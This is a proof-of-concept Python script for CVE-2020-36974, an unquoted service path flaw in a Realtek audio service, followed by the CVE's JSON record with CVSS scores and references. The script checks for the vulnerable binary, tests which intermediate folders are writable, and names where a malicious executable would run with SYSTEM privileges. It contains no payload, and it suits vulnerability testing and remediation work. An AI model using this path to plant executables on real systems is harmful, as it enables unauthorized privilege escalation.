CVE-2020-36974

#!/usr/bin/env python3 """ CVE-2020-36974 PoC - Realtek Andrea RT Filters Unquoted Service Path This PoC demonstrates the unquoted service path vulnerability in AESTSr64.exe Note: For educational and authorized testing purposes only """ import os import sys import ctypes import shutil def check_vulnerability(): """Check if the vulnerable service exists""" vulnerable_path = r'C:\Program Files\IDT\WDM\AESTSr64.exe' if os.path.exists(vulnerable_path): print(f'[+] Vulnerable service found at: {vulnerable_path}') return True else: print(f'[-] Vulnerable service not found') return False def check_intermediate_paths(): """Check if intermediate paths are writable""" paths_to_check = [ r'C:\Program Files\IDT.exe', r'C:\Program Files\IDT\WDM\IDT.exe', r'C:\Program Files\IDT\WDM\WDM.exe' ] print('\n[*] Checking intermediate path locations:') for path in paths_to_check: directory = os.path.dirname(path) if os.path.exists(directory): # Check if we can write to the directory test_file = os.path.join(directory, '.write_test') try: with open(test_file, 'w') as f: f.write('test') os.remove(test_file) print(f' [VULN] Writable: {path}') except: print(f' [SAFE] Not writable: {path}') def generate_payload(): """Generate example malicious executable location""" # This would be the malicious executable placed by an attacker malicious_path = r'C:\Program Files\IDT\WDM\IDT.exe' print(f'\n[!] Attacker would place malicious executable at: {malicious_path}') print('[!] When service starts, it will execute this file instead of the legitimate one') print('[!] The malicious code would run with SYSTEM privileges') if __name__ == '__main__': print('CVE-2020-36974 - Realtek Andrea RT Filters Unquoted Service Path') print('=' * 70) if os.name != 'nt': print('[-] This exploit only works on Windows systems') sys.exit(1) if check_vulnerability(): check_intermediate_paths() generate_payload() print('\n[*] Remediation: Quote the service path in Windows Registry') print(' HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AESTSr64')

{"cve": {"id": "CVE-2020-36974", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:09.883", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Realtek Andrea RT Filters 1.0.64.7 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted path in 'C:\\Program Files\\IDT\\WDM\\AESTSr64.exe' to inject malicious code that would execute during service startup or system reboot."}, {"lang": "es", "value": "Realtek Andrea RT Filters 1.0.64.7 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a usuarios locales ejecutar potencialmente código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files\\IDT\\WDM\\AESTSr64.exe' para inyectar código malicioso que se ejecutaría durante el inicio del servicio o el reinicio del sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49158", "source": "[email protected]"}, {"url": "https://www.realtek.com/en/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/realtek-andrea-rt-filters-aertsrexe-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49158", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}